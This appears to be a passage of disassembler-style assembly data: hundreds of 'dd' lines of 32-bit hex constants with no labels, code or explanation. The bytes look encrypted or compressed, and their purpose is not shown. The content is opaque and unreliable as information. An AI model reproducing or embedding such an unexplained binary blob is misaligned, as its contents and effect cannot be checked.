861D7224h, 3BAF72FCh, 45A106A0h dd 7CEA67D8h, 0B57088EBh, 3BC104A3h, 9616917Ah, 6EFB41E4h dd 4910DFE4h, 0E1573138h, 637F5A6Bh, 0CE6ED922h, 233F7AC1h dd 7E08919Dh, 43CCD774h, 5BB942FAh, 0EE25E5B0h, 2068C443h dd 8055E6D9h, 0A9D2D2Ch, 8DF04C11h, 0BA6DD1DBh, 16A01CA1h dd 0FB0CA70Fh, 4550DA52h, 0A83DCA99h, 0D3838A14h, 4EEE7790h dd 0A3766DC4h, 0FEBE004Dh, 84D56375h, 2338F477h, 0B0056A91h dd 0D32141FCh, 0FB1469h, 0E6B893ACh, 0E670F908h, 20DD2D03h dd 57209C0Fh, 0EAF79DE4h, 46D05A30h, 74BC7537h, 9E4309D4h dd 0C658F26Ch, 9D663FCDh, 7760922Ah, 3CE06A84h, 0F82DBDCCh dd 83902C9Fh, 30ECFDBCh, 2140CA56h, 9E1817A1h, 897B7A32h dd 3EC45165h, 164DABB4h, 6378349Ch, 0F0428BF1h, 618D413Ch dd 56EC09F6h, 46B29E67h, 0ABE9FAF7h, 0C8932B09h, 5DCB1974h dd 0BE6F4BB0h, 0D10CDDDAh, 5FE87194h, 6055B5D4h, 8D981497h dd 26F5DA40h, 0BCD75653h, 0FCB7AA34h, 6F9E80Ch, 0C6D05EE4h dd 1FA832D4h, 0A015F594h, 4B58D457h, 24B4B584h, 1408921Eh dd 56883AF4h, 44B846CCh, 0A78DBA4h, 8E69982Bh, 0B740CB3Ch dd 0D88D5D2Ch, 0EF04C3Fh, 3EC952D6h, 2DF6BF4Bh, 0EB9002BAh dd 2F50DA64h, 9E28B06Dh, 95598A7Eh, 0B1D208E6h, 108BF051h dd 3D79F99Ch, 0ED1657F7h, 0A138C27Ah, 8612AEA0h, 5EEE9AFCh dd 628E4AD4h, 0ED46EE8h, 0DDE26F7Bh, 0BC5D26Ah, 9616BDFEh dd 0D3754B3Fh, 46E6613Ah, 0F63B3C0Dh, 0F68008E0h, 0F24A5FEFh dd 0A930BA72h, 7E0A9298h, 0B465E1F4h, 0D1B874F7h, 831F1BD4h dd 0DE5EC580h, 8DBA4FDFh, 0FEE7A21Ah, 2F75F505h, 0B5C864E4h dd 209BCC31h, 0EF08FD8Ch, 0FE005FEBh, 13A3B20Ah, 7636B1FEh dd 3F27780Fh, 7B35B5C5h, 758824A4h, 0E05B18F9h, 5131214Ch dd 39F9B55h, 5EDE4A96h, 36C1F23Ch, 6625AFACh, 6D70CCB8h dd 4848B893h, 925055EDh, 4FB638Fh, 112959A4h, 6C232D6h dd 0E357BF19h, 0D7E1E25Ah, 2B30BA44h, 81F6DF18h, 0FD86950Bh dd 2EF54641h, 60901AA4h, 0DA2F7FD7h, 3BA4F8FFh, 0B823B6B9h dd 0EF96D604h, 0BD6334DEh, 0E3422876h, 0EE12D607h, 0C620D30Ch dd 0F4E4393Ch, 1CC40114h, 4ED80AECh, 66DA32C4h, 0F0E240CDh dd 38F51524h, 0F638F477h, 0EE505EA7h, 5EE802F5h, 36AA9E5Fh dd 4EF2EE27h, 0E41AFAEEh, 0D648B80Eh, 9620DA3Dh, 4A98266h dd 0D32F0A1Bh, 1E9E094Ah, 90553CBh, 0CF5F6663h, 13BDBA44h dd 7E3E821Ch, 56EC694Dh, 0DD57C9CCh, 67D9B01h, 5368C46Ch dd 8054FDD1h, 0DEF85D2Ch, 0CD01050h, 0C05DAD23h, 93A01C8Fh dd 0DA0D5D4Ch, 0C651948Ch, 9E395A3Ch, 13538A14h, 3BBA07A8h dd 4FC26AA3h, 9BE47BEAh, 81608F13h, 0AE3D8DA4h, 0EAA56524h dd 0A1E844C3h, 0FBC841h, 9B6775ACh, 0E646C1C2h, 0BC22D236h dd 0AD563FCBh, 4641823Ah, 0D1D05AE5h, 1221D397h, 9D75EB0h dd 0F86358F9h, 25C68944h, 4834C4B9h, 1B46AF4h, 1506D733h dd 0C6151A92h, 5D2E9408h, 5832CEAAh, 863CD6D3h, 4C9A7A6Eh dd 57EC723h, 0D6252A82h, 6EBDEF8h, 0C650DFE3h, 7DB97B0Fh dd 2085B32Eh, 3BD854D0h, 2CCBBF6h, 8CFB71B8h, 57489E07h dd 0AE365F8Dh, 0D644CA24h, 0EB823AAh, 5855B587h, 8B981497h dd 0E904A344h, 0B66CA6A3h, 0AA762FBBh, 0AB10823Ah, 152FA519h dd 25EEA743h, 786B0AA2h, 0CF7026EDh, 5967BA44h, 4833D489h dd 107595F4h, 0C7B874F7h, 0F96FE1CCh, 0DE02A87Ch, 0B62ACA3Eh dd 8F70A246h, 0EDF07E04h, 6EC83818h, 0D22B26DEh, 962EE073h dd 0C650EE3Bh, 44C07B0Fh, 0FBFF75EBh, 78CD2479h, 77E168C4h dd 0B41DEDCCh, 5560DC4Fh, 3EFBE288h, 8648C27Ch, 5EE842F5h dd 36C044BCh, 0E9822ADh, 0E670FA84h, 0BE48D25Ch, 96208291h dd 6EF8820Ch, 0B9830CB5h, 28936029h, 5AD9A194h, 352D22E8h dd 2BF354A6h, 4811E389h, 0C31F38F4h, 2E8E7966h, 39FC9F2Dh dd 0C880F24Ah, 0FA40CA54h, 0FB73CD43h, 0F822A74h, 5BA43BAAh dd 77F64FD3h, 0AF1D77E0h, 53AF8A64h, 9E1E896Eh, 49700F9Dh dd 121B62DAh, 43C35B86h, 9BE573D2h, 0BC02A510h, 0DD4CA129h dd 0D564CC78h, 5E9C1199h, 44B439B8h, 0EF647C0h, 871588C7h dd 0D70EB728h, 9661CF58h, 0F9DF04Fh, 2F963F90h, 7FE557D0h dd 98E97AE4h, 8D58A30Bh, 0D251DF36h, 117AC279h, 25930F97h dd 5CFB428Dh, 63E47BC1h, 0B105972Eh, 0DE14AF20h, 0EA79C75Eh dd 3823904h, 6AAD26BDh, 77C558DCh, 9C3B02E8h, 0A324BB01h dd 0F247DD68h, 66CEF7Ch, 208B50DFh, 4EC34AA5h, 0BB8866F3h dd 8214830Ch, 0CF5DB024h, 0EF569A40h, 37BC1790h, 59942FB9h dd 7AEB5BFFh, 8F2497E1h, 0F848B731h, 0DA45CF46h, 0F8AE065h dd 1D02396h, 77EE46D9h, 82C16FF8h, 0AC319018h, 0D555CE31h dd 1B4F925Dh, 3A892C80h, 54D111A9h, 63D71AC1h, 0B201B408h dd 0DB299E31h, 0EB5FA249h, 29F3770h, 76AD3EA9h, 7AC444D5h dd 0A97843E9h, 0A304AE01h, 0F76EC251h, 174EEF78h, 4E990781h dd 72C45F83h, 0AEF87FF9h, 97089E15h, 0DA5D854Ch, 0F562FF72h dd 5E861D95h, 60B42F93h, 67EB50C9h, 9E3594EBh, 0DB0FD21Dh dd 0FA4FFC40h, 279DEF79h, 34BF3C8Ah, 77DC53D1h, 0F6C164FBh dd 0AA398D20h, 0D452D308h, 3F71E07Dh, 268127F4h, 59DD2B9Ah dd 6FD67CEBh, 91689710h, 0F02EAF24h, 0C37DCE45h, 0F800A65h dd 3E8935B2h, 78C55AFBh, 8D1770DCh, 0C623A901h, 0FD47C06Ch dd 4573F971h, 3CB124DEh, 76B04EB7h, 9BEB7DEEh, 0E4539907h dd 0DA40A702h, 0F275C924h, 3B841BBAh, 44B43E95h, 7AED40C5h dd 0E63189E1h, 0F83CB70Fh, 0C245C65Dh, 6E9DEF65h, 23B536B7h dd 67FB32CCh, 9BE57EE7h, 0AB358B38h, 0CF76D510h, 175CF770h dd 3E00F99h, 5ED92FA2h, 71F573F2h, 0B72E9433h, 0E040AF38h dd 0FB6CD045h, 0AB11665h, 3EAB3DB0h, 62C958E3h, 821144E9h dd 0B21EDA01h, 0EB42D67Dh, 450FE67h, 22B11485h, 55D55DA1h dd 9BE37DC8h, 0A22EEA1Ah, 0CF5DB00Fh, 0EF56FF50h, 10E81790h dd 53B209A0h, 5EFD56CDh, 831395F6h, 0F048A12Fh, 0F352E940h dd 3E9DF66Dh, 23B33596h, 66ED41CFh, 0B5F44494h, 0BA39871Eh dd 0C555E921h, 1067FB68h, 159424F4h, 5AD927BEh, 63E34FC1h dd 0B11AA20Eh, 0C533AF37h, 0C36CEC2Ch, 0FA60A65h, 588725B9h dd 62C34FE7h, 0EE166DE5h, 0B61FAE2Ah, 0F76EDC59h, 3800EF78h dd 2BA82D98h, 49C26AAAh, 8DFB77FFh, 0B30B8520h, 0DA76C222h dd 0E875EA6Bh, 2A8B17AFh, 36AE25BDh, 7CC856E2h, 85158EEBh dd 0CC218428h, 0FA41DF40h, 195E741h, 8D02396h, 7BDD63C8h dd 98C973E6h, 0A32A8D0Ah, 0C959CE25h, 1567C672h, 18E00491h dd 47CA15B8h, 6FC67FD0h, 0BF1D860Eh, 0DB258738h, 8E61D043h dd 339C0E56h, 51AB3BB2h, 62F34FD0h, 89166BFEh, 0A811B530h dd 0EA7BDB4Fh, 116EE366h, 0F8B35ECh, 54D14E97h, 0FEF867E8h dd 0A50F8617h, 0CD57B129h, 8664FF4Fh, 30861D9Fh, 36B429B1h dd 66EC47CBh, 840489EBh, 0D329BC25h, 0F352AA51h, 1DF8F46Fh dd 46B43481h, 75CB5DCFh, 0BF807EF1h, 0BC3D9602h, 0E544DF2Ah dd 1B7BFD70h, 328E0BBCh, 67B827A0h, 74F56ECAh, 991C9712h dd 0D903BE31h, 0ED7DCC42h, 35941F70h, 5BBC33A8h, 62CE63B4h dd 8B1670E9h, 0A3209510h, 0D728F352h, 465FE7Ah, 1AC0782h dd 73DE5FB4h, 0FEC97EEEh dd 0B314843Dh, 0DA5DAC3Eh, 0E271FF76h, 3B841BBAh, 60840BD4h dd 3DD172EDh, 0AA34D4B6h, 0DB1AD210h, 0F94CE953h, 0BB3E77Fh dd 23825A9Dh, 7BD87DDBh, 8FE541FAh, 0CE199A29h, 0F757DF16h dd 77AF769h, 238C0BA2h, 6FC007A9h, 61F548A4h, 881C972Fh dd 0D335A635h, 8E59DA69h, 0C064952h, 0B59E04DEh, 44A14060h dd 0B8607073h, 0F9204F9Bh, 5AA3B20Ah, 2656DC42h, 56A89DBAh dd 1D6EAF3Bh, 3A0B12AAh, 0DEA2B464h, 55714F4Ch, 0EE41520Fh dd 0B6E872FCh, 35E40659h, 0BF222C6h, 8C23AAD5h, 0EE845959h dd 0C2707EBFh, 3CA9C266h, 4045A5B7h, 9DA80480h, 637F0650h dd 0CE6EDE62h, 65387EC7h, 451C0791h, 9FD36AC2h, 46EA42A6h dd 6A21A94h, 8F3936F7h, 0E7108A3Eh, 4E9BBA46h, 689A2E0Ch dd 3C5DAD8Ch, 95A01C88h, 3C4B2248h, 5F5F1AE1h, 0C6F245FEh dd 21C34837h, 8F309DDFh, 294FC53Bh, 0FE88B718h, 0DF08BA74h dd 2538C23Ch, 0D10F0F0h, 36A81830h, 36D04AD4h, 64CA20C6h dd 96799284h, 0BE22D25Ch, 6970F965h, 58C37499h, 0B98905E4h dd 28937429h, 827F8F94h, 0B2D5691Dh, 45308C51h, 7E9D1F10h dd 55E05CE4h, 0D1EB151Dh, 0E4159176h, 5368C447h, 0B66731DBh dd 71334A2Ch, 0E37B85FBh, 3EFE6926h, 3EE8A539h, 0F490028Ch dd 4DAF259Bh, 0A81354B9h, 398F0714h, 0A6D862C4h, 0D94FC5CDh dd 0C5629717h, 16E5EA42h, 21B5E238h, 8610B278h, 0A1168614h dd 0C445C12Bh, 8B981497h, 6B7B8E44h, 0BE60BBD3h, 68FF4234h dd 0A9737DF3h, 0AE8599BBh, 1EA832BCh, 0E66D8BC9h, 0FD58D477h dd 3BB5378Dh, 2F08A402h, 6B13BA0h, 0BB47139Dh, 6A621D6h dd 214CF6FBh, 807B8CC1h, 8ADAFF2Ch, 66182F04h, 63C852DCh dd 0D9FC735h, 111202BAh, 0DD5A4FE9h, 0CC78B20Ah, 7624AAD9h dd 8A5B62C6h, 0A3775CC8h, 0FEBE09CCh, 53A7CAB9h, 0AE0ED91Eh dd 863A9A00h, 4482B1A1h, 36C9A28Ch, 4C1522ACh, 2F8E50E5h dd 0D78B2229h, 0A01CCAA1h, 667C870Ch, 0D35918ECh, 1E9E0EDCh dd 0A343E863h, 0CE58E284h, 4BB1E744h, 7E3E8985h, 6A84F77Fh dd 523B42FAh, 9901280h, 0DE684BF8h, 0BEAC4B54h, 0DA18A22Eh dd 66F17E6Ch, 0A45DADDCh, 9DA01C8Fh, 0CAFC8F70h, 0C650DB60h dd 7628D86Ch, 76008A10h, 4E8A30BAh, 0B025C593h, 0CD8824A7h dd 0D2F767BDh, 0FF38C24Dh, 0D712F075h, 5E807396h, 64804AD4h dd 35FAB753h, 63E6FAB2h, 0EE13A6AAh, 9724C260h, 91AF820Ch dd 44F07E50h, 8B5732BCh, 0F6B636D6h, 0BA986735h, 0F6245952h dd 7E624697h, 0B73BA6h, 1562D733h, 83C91A92h, 88B887BCh dd 8D065FABh, 0D995A21Ah, 0CA72840h, 0A9450A98h, 16A02BB0h dd 84B83127h, 6DA38374h, 0CE78E26Ch, 2450DA44h, 75B2F713h dd 0E2313AF2h, 0FE881094h, 0DE449E8Bh, 920A57B3h, 79439A12h dd 68D44069h, 320217D4h, 4A6A2ACh, 6D36FBF1h, 885DAAD1h dd 1B394934h, 58E88299h, 100159E4h, 0DE2CE043h, 0F79F829Bh dd 4A57E26Ch, 0A630BB54h, 0B32AC9Ch, 68602CE4h, 2F3C4DCCh dd 86901AA5h, 2F1DD242h, 0E67E4B12h, 0FB5FEC65h, 0A03FF146h dd 1587539Ah, 16CA7B7Ah, 112B54DDh, 0F06CF0F1h, 5F13EB3Ch dd 76DF0F1Bh, 0CB5562ECh, 26862455h, 0F2E012F6h, 8660EA74h dd 84AD3D1Fh, 0BB10AC18h, 5EE872F0h, 367FCFDBh, 0BF7122ACh dd 6770FA84h, 0F71A8262h, 33A5A562h, 0EDF8820Ch, 7A7C5222h dd 872C3DB1h, 0CA800A94h, 62AB974Ch, 233F8078h, 7E089290h dd 76C06759h, 0F8562ECh, 73E47FC3h, 0FE545E03h, 0C8C1B621h dd 0FA7082D3h, 0E7810F70h, 4B851A2h, 7ED5059Bh, 0EE87454Ah dd 0D6EAEB6Bh, 6928B21Bh, 0E3FFD8F6h, 4EEE5926h, 76E0FAF7h dd 0F76042CCh, 9260EA74h, 0C256B523h, 8674FB4Bh, 62D2E703h dd 0F6454AE2h, 0C7AB14D8h, 0DA147F0Dh, 0D619D26Ah, 1620A834h dd 3EAED35Dh, 7AEECF1Bh, 8B25328Ah, 0F6B61107h, 9A91D13Ch dd 0F762EA15h, 0C9D6D4Dh, 0D1E05CCFh, 0BB4766C8h, 6A621E2h dd 53E83184h, 0B676DF3Fh, 0E4DB5B2Dh, 99F11005h, 3ABBADEFh dd 0AB203F4Bh, 0EE4E4284h, 430EAE65h, 0AD72C6FCh, 0C5D001CFh dd 728861E7h, 3B078F49h, 440312AAh, 0D660EB78h, 0AF3048C7h dd 7E139A24h, 0D588B9D7h, 5766B91Fh, 0ECDF27D8h, 655E1171h dd 351BDD9Bh, 42ABFDF8h, 2E92D65Ch, 0B9BA08B5h, 22AEA743h dd 7B0B0AA2h, 0CE6ED916h, 8D3C7EC7h, 79E111D3h, 568A6D33h dd 61314224h, 49C3D9A7h, 9F3FA63Ah, 0FB1C8F06h, 0E16AC145h dd 12961577h, 50A10580h, 65D745D0h, 9C0D41D0h, 0B23EBF16h dd 0ED5AD76Ah, 2A6EE57Dh, 22A81AA9h, 54D548ABh, 8CE9469Ch dd 9E148F13h, 0AE4CB123h, 0D6109A26h, 5EE872FCh, 52A338BDh dd 6BF15882h, 8A00D4E2h, 0FD019C5Ch, 0F5438A7Fh, 188CED74h dd 13DA3B80h, 3EFA77EFh, 0BFCF40E3h, 0B87EC222h, 0D344C82Dh dd 7EE0C716h, 0BE06AF4h, 301BAF4Dh, 83561A92h, 0DE5EE717h dd 28D53554h, 4F189417h, 5A8465ECh, 8B434CB6h, 169611E2h dd 0C044AED5h, 4736F011h, 0EB354D02h, 2CBD0737h, 0C5D854D0h dd 83E738B2h, 7B05B7FAh, 0D656DDA5h, 99CF47C3h, 0FEA9A12h dd 106488BAh, 3771B12Ah, 6F73ED4Eh, 198BE56Ch, 9A3451A3h dd 0C355AE3Ch, 2EF007CAh, 0AED05AD2h, 1EA832B4h, 0D8C34CC7h dd 0CE14AE28h, 9D9A2FBBh, 0BE03922Ah, 3C737D80h, 0BB4711CEh dd 6A621F6h, 0D61C32F9h, 0F6484FAAh, 5EE7A21Ah, 98749297h dd 3520AD23h, 45A02AB4h, 0A12741CAh, 8A14F437h, 0BD7B270h dd 7636B1BEh, 0B1260B04h, 0D35ED23Bh, 7377ED63h, 0D656F8A5h dd 2BB50B7Fh, 8626DA20h, 0FB923ADh, 67911B84h, 353EB753h dd 0ED98FAB2h, 0EB48D25Ch, 0A572EF67h, 22BCAC3Eh, 0D32F5AA8h dd 1E9E0916h, 0F680007Ch, 0BE2B956Ch, 0D25ED336h, 2E08D37Ah dd 6DB2FF0Bh, 0AB3142FAh, 6A621FEh, 53E5C373h, 0B676D325h dd 0B27827A5h, 99A17A32h, 8F3F849h, 12C8B9B4h, 6378028Ch dd 0F049A4D1h, 23A5EB3Ch, 7636B652h, 0B12DCD04h, 0A3775C3Bh dd 0FEBE0CF6h, 73E3BA74h, 0AE0EDC20h, 0AC851724h, 0EE844E2h dd 5CC12080h, 0CF070ACh, 19F0FA84h, 887498C9h, 0CCE02F34h dd 0E375A079h, 46E644B9h, 93AE58EEh, 0C09E6021h, 9E0EB66Ch dd 5962EB14h, 4834DC89h, 0C31F32F4h, 2E8E7E8Ah, 38F79F62h dd 3668F24Ah, 0B640CA58h, 0CD57F17Bh, 48C2494Fh, 3E841E98h dd 2D0ABF4Bh, 86EB02BAh, 0C650DA63h, 86FD07B1h, 0FB598A22h dd 78E47451h, 0D39AD2C4h, 0F260ED63h, 8160EA74h, 0E0718C05h dd 0C23ECE61h, 0A1E83EB0h, 0FBE041h, 158A7ACh, 0E672CF00h dd 0BB20415Ch, 1B20AA34h, 58E191B9h, 0FB5D03E4h, 1E9E0E8Eh dd 974F97Ch, 0F8E56193h, 0A6308C78h, 7C181613h, 0BA616AF4h dd 2EB8435Ch, 79172F0h, 4B97F27Ch, 0B676F642h, 8F8866ADh dd 0EDA07A04h, 6CC83808h, 2A96BF4Bh, 2EFD02BAh, 0AE5DAF3Dh dd 9E28A1B4h, 4DCA1FEBh, 0AC3362DAh, 38DC8747h, 8B8812AAh dd 0A6E5675Dh, 0FE38F452h, 0BA320FDBh, 9E6D72CAh, 3749CEDBh dd 4E1322ACh, 19707188h, 0D2CD5D6Ch, 50209C2Ah, 58C6E589h dd 46BA5BE4h, 1CC233D6h, 0CAAE9F6Bh, 36DBE25Ah, 0C6B4B5BBh dd 0ED08921Dh, 4888FF79h, 3ED242FAh, 936F49F6h, 0DE5ECE62h dd 334F0AD1h, 8E18A36Ch, 7872C789h, 367952EAh, 0E95A035Ch dd 0EEEC6A73h, 0ED0EDA64h, 0BA1C3BDAh, 0D4957540h, 0C3D854D7h dd 10AEAA79h, 1689A39Ch dd 299F107Eh, 0B04557C1h, 867A9A12h, 5EE86694h, 0C99318D4h dd 38A40839h, 0C2347784h, 0BADD5F48h, 0C6209C74h, 0E5F23403h dd 87C47EA0h, 54AA3A5Ch, 0F4CA1895h, 0C55BA87Eh, 26389E00h dd 9EC99DFDh, 12EB3BFCh, 1C4752E8h, 6E2D97F4h, 3668C440h dd 0B640CA48h, 0F62E8C09h, 48D05424h, 1BED68FCh, 6E980491h dd 0CB587AA9h, 891AD017h, 9E08FC75h, 2C957543h, 0CFD854D7h dd 26B09600h, 0AE88789Ch, 439FB923h, 0AE0EFE66h, 939417AFh dd 5E8272CAh, 0FFAB5137h, 0B7073A1h, 0C070FA84h, 0BE42B679h dd 0CCB55563h, 0EDF8B437h, 0AD805620h, 1EAF5AB7h, 4B0D0A94h dd 0CE6EFCFAh, 33CFE913h, 7E3EAE36h, 29EAA71h, 12D0F741h dd 0A3131A92h, 0DE5EE7F8h, 0D1CD4754h, 0A5189412h, 37F010CAh dd 0AB37018Ah, 16961692h, 9078FA0Fh, 38DB4B4Bh, 0A24007B1h dd 7BB08A22h, 5EADCC1Eh, 0DCA7D2A4h, 8CE9ED63h, 5B690963h dd 44D3C33Bh, 483B55AFh, 6280CF71h, 92334AE2h, 0B773D52Bh dd 0FCE505D7h, 3E48E460h, 0A035C189h, 448C830Ch, 46A56A8Ch dd 0D43DCDBCh, 76803CAFh, 0F86685D1h, 0B744BA44h, 606417DBh dd 56E06AC2h, 0AB7E42CCh, 6A624C3h, 20601B7Ch, 338735ABh dd 8E2EB758h, 0E6F07A04h, 3ECC9081h, 36EF20B9h, 80176DE2h dd 0E636B544h, 0FB4EDB50h, 564FAA35h, 2BB50B98h, 6DF4EE4h dd 9BE477FFh, 0A2019816h, 0A435E329h, 0A630BA04h, 2DC83DDCh dd 53AD27A1h, 6FFF02DEh, 88159EF6h, 0EC42DF7Dh, 0F845C651h dd 1D9DEE78h, 66A93697h, 6ED853D4h, 98E12AEDh, 0B63DC208h dd 0D253DF34h, 527CFC7Dh, 379419D4h, 40D126A2h, 2BB020C3h dd 0BF3FF871h, 0DF28A920h, 0EF38C542h, 2D01668h, 5FE82BBDh dd 78804EDAh, 9A1065E5h, 0A936FA48h, 0EC4E924Eh, 126EEF7Dh dd 6E91429Fh, 52D95BB3h, 0A9821FA6h, 0B3128F1Ch, 0CB4AA36Ch dd 0F37FE304h, 2C8E52D0h, 52AE2FBDh, 4DB81DDFh, 0C71597EBh dd 9E3C9B7Ch, 0E200D95Dh, 4F9DEF65h, 61A413C4h, 7FC412CFh dd 0F2A16FE0h, 666825E8h, 0A57C18E5h, 57474666h, 0F9F0CCE0h dd 2ED82CB3h, 5A588568h, 0EAA9EB0h, 96F9E830h, 8E06C16Fh dd 66F07A04h, 3EC852DCh, 16A02AB4h, 0EE78028Ch, 0C650DA64h dd 9E28B23Ch, 76008A14h, 4ED862ECh, 26B03AC4h, 0FE88129Ch dd 0D660EA74h, 0AE38C24Ch, 86109A24h, 5EE872FCh, 36C04AD4h dd 0E9822ACh, 0E670FA84h, 0BE48D25Ch, 9620AA34h, 6EF8820Ch dd 46D05AE4h, 91A832BCh, 9647620Ch, 0F18C47EFh, 2530BA72h dd 48374AB9h, 0E1EF6AF4h, 7D35568Fh, 4D2715BCh, 55B8F17Ah dd 9D64EE10h, 976AAE6Eh, 15F8383Fh, 2A8AD9C8h, 9FAC689Fh dd 0D847D619h, 1ED55364h, 75288403h, 5EC20911h, 8CB9BB0Eh dd 0A3383AC0h, 0FEBE36FAh, 0D6608E9Ch, 0AE27AA4Ch, 39D9A24h dd 5EDE516Fh, 42D8738Dh, 0A58A1A0h, 638F0D66h, 0BE7EEDE8h dd 95F95DF7h, 58DCE481h, 0B9C0B9E4h, 1E27CECCh, 1484E217h dd 5DC56B9Ah, 25308C67h, 7B7C9226h, 24E358DFh, 0D2F6CFDCh dd 85CE41FCh, 0DA1CF246h, 0B5ABF8ABh, 6608D0D3h, 990F8553h dd 0B3E39CF7h, 1696156Ch, 0DA3301D4h, 7ED555A7h, 59288403h dd 403F3E91h, 4ED862ECh, 268CD2C4h, 7B03129Ch, 0D656D5C0h dd 51CE54A4h, 860872DBh, 0E36B72FCh, 36F67560h, 879057ACh dd 0D054F519h, 41D4395Ch, 0A01F1EB9h, 0EB77410Ch, 46E6655Ch dd 211CA735h, 0F5680AA2h, 0FD58E26Ch, 35BB798Dh, 7E08929Ch dd 0A80D82A6h, 0BBBBBD33h, 6A6257Ch, 0A4EB247Fh, 324FCA58h dd 8E18A32Bh, 66E00087h, 3E35D6D3h, 542B2AB4h, 26905280h dd 0C5AF259Ah, 0A8176AB9h, 26C68914h, 0B7586A66h, 0A6A94EC4h dd 0FDFC3C65h, 5D910134h, 4FB9C304h, 59CF45FBh, 12AC8B7Dh dd 0DAB54A98h, 8D5009F5h, 697F007Dh, 0BE48D2EBh, 68582B52h dd 0EBF7B03Fh, 46D05A4Fh, 1E92B1EAh, 0BC0B0FE1h, 455A097Ch dd 0F7C1B94Eh, 81F6E0F4h, 8E55690Bh, 83B874F3h, 0FDE8DA21h dd 0DEEC7673h, 3BFCA54h, 8E2E9DF4h, 98A59254h, 0BBCBAD23h dd 1696156Ch, 0D1A08703h, 0C253DA52h, 5EABE118h, 79DBB916h dd 5C3B6A5Ah, 7590F344h, 0FAAC365Dh, 0FF44F65Dh, 0EE63E640h dd 7D9173CFh, 8353A5F3h, 0CD4174A0h, 0D5F66704h, 1DF1CCF0h dd 41E9E905h, 6DA18440h, 0C24DA0DAh, 0BD517C90h, 0EDF0DB2Fh dd 0D0114E0h, 3D000B11h, 5DB1AC30h, 9F2DAD5Ah, 0AD616480h dd 0CF9D7DFCh, 936F1CD0h, 0DE5ECDC4h, 4931230Fh, 0D465DD3h dd 89196EC6h, 0FD37AD22h, 4EA440B7h, 118D3464h, 86C5529Bh dd 0F828841Ah, 7418BBACh, 4D3CA20Eh, 8DD6D8C6h, 16D014F6h dd 299F1F6Fh, 293000CFh, 0DE15F0F5h, 0A11D7C14h, 353ACA2Bh dd 5E2829DFh, 0C0307F86h, 55E2D26Ah, 0CE48C013h, 6D0202A6h dd 57604291h, 0E15CDC54h, 0F681B26Bh, 1CDCE26Ch, 46E1B730h dd 88E358E2h, 56586F1Fh, 853842CCh, 8B53A546h, 0E85042E9h dd 4197E154h, 0BEF61F6h, 66C642A1h, 36C852DCh, 0D760BFBBh dd 6B8E096Ch, 0C666E2C7h, 0F82EC73Dh, 9D250319h, 0ED5D94FFh dd 24B00CFCh, 0F3EE14E9h, 0D28BCF45h, 8B39CF2Ah, 3AF83142h dd 0D5178D03h, 0A3497E97h, 0EAE1D60h, 6387392Fh, 0BE7EEAF9h dd 9E20AA34h, 6A381703h, 0DA38F058h, 9757CD43h, 0C0BFDA01h dd 6DDD146Ch, 0A7308C7Ch, 4F079669h, 96CB681Fh, 0AB4F8167h dd 6A62201h, 0D668F27Ch, 33CAED20h, 8E2E9AB3h, 0FB9AC5h dd 588DD9D1h, 0BC589A1Fh, 0D6E78706h, 2691DA52h, 0FA4FB727h dd 45AB8C9Dh, 0A573042Ch, 0A9D482D6h, 74231299h, 0E05875F1h dd 6F60C64Ch, 45BB82C4h, 7E038E4Ch, 362BF2B2h, 177389CAh dd 0E28FEEEh, 41B721A3h, 57F2AEB9h, 6B9E8AECh, 0EDB69A6Dh dd 8E183157h, 0AE82603Eh, 31AB0484h, 0D2E23EBBh, 2600F82Eh dd 0A913B01Ch, 5C72BC33h, 0F8556E67h, 20A186B6h, 489BBE9Eh dd 7014D6E6h, 98FC0ECEh, 8EC42616h, 0A66DC14Dh, 5EB1E971h dd 76953191h, 5DE959C4h, 4EB03799h, 0CB2F62DAh, 26860261h dd 7E88129Ch, 0B6D0E900h, 0BBD35E6h, 8610AC1Ch, 2AE072FCh dd 0BD95F2D3h, 41332240h, 0DED57F73h, 0BE4BD26Ah, 122FAB34h dd 6EF882DBh, 0ED7AB254h, 21148F35h, 1E300AA2h, 73D149C6h dd 0A6068584h, 46AD17EBh, 56E36AC2h, 3BCC42CCh, 3E359F53h dd 0DE68F24Ah, 0B334CB54h, 71E663C4h, 0CC19CAFBh, 824DD977h dd 9DA01C8Bh, 67B02943h, 0F06F1ED9h, 62603B3Ch, 8964EDACh dd 8EEBC9DAh, 0A34791A2h, 0FEBE2A39h, 0D660EA77h, 2BCECC38h dd 8626A287h, 0B6ED067Ch, 0C93FB496h, 87FC4514h, 264351A2h dd 3BBF793Ah, 96169291h, 6EF8820Fh, 0C3260F90h, 1E9E0A1Fh dd 1E857F14h, 31A71C72h, 59CD1EACh, 962822E3h, 0A91F9142h dd 96DE7B2Fh, 0ADF60F5Bh, 4BE359EDh, 0B676F2F1h, 4CEF70DBh dd 66F07A07h, 402046A9h, 0A65FD549h, 15E8EA93h, 7E36259Bh dd 354EA7C3h, 0B98B2185h, 711CE767h, 0EE9B3AF2h, 9745A15h dd 0E0584FF1h, 0AE38C14Ch, 713EEE24h, 68D0D779h, 36C04AD4h dd 0F9BA56AAh, 0D0485F01h, 0BE48D25Ch, 7E25DF35h, 91077FFEh dd 7E75DF13h, 1EA8328Ah, 0F3F40E94h, 31A6EF84h, 3B54DBBh dd 7A08A424h, 22E06AF4h, 0D0DFAADBh, 2F28E55Bh, 75A00CBCh dd 0C280C2ECh, 0FBA00928h, 0CD9791FCh, 66DD72Bh, 16A82A82h dd 0A10D028Ch, 0FEF367E4h, 0EA28B20Ah, 883B6252h, 67609D13h dd 2C7913DCh, 0C8B08D39h dd 0D5842A74h, 96A76746h, 36BB9A12h, 0DB62D84Dh, 36F67277h dd 4D89206h, 0D0486501h, 62E785Ch, 13D757D6h, 6ECEBAA9h dd 46D05AF4h, 571835C8h, 83386C3Eh, 7EF38490h, 660310ACh dd 0D6B51BB7h, 0A1E05CCBh, 1880E749h, 6903AA4h, 6E61877Ch dd 2BC5C00Ch, 24189414h, 0A671C262h, 66DD72Bh, 16E02A82h dd 0ED0C028Ch, 0CC781EE4h, 0A8102F99h, 0FFABEC14h, 78E7CE51h dd 0A34791C4h, 0FEBE2A39h, 9660EA74h, 0FE88CB39h, 0BE8D1F26h dd 0A94272CAh, 0F8EF51h, 0E98A2ACh, 567B8F84h, 20CDD8E4h dd 3C209C0Ch, 0D69EBFE7h, 0C32742D5h, 1E9E0A19h, 0F6800B94h dd 0E7E8E018h, 9EAE1F4Eh, 9AC8922Ah, 0C84560F7h, 48B874F4h dd 87287C0Fh, 7BED058Ch, 0B640FC6Ch, 0FB18A22Eh, 6C38CE06h dd 8F0CC79h, 9F0B4CB4h, 0D847CA31h, 0EEE06264h, 6983B23Ch dd 40382F91h, 4ED86AECh, 0CEC14EC4h, 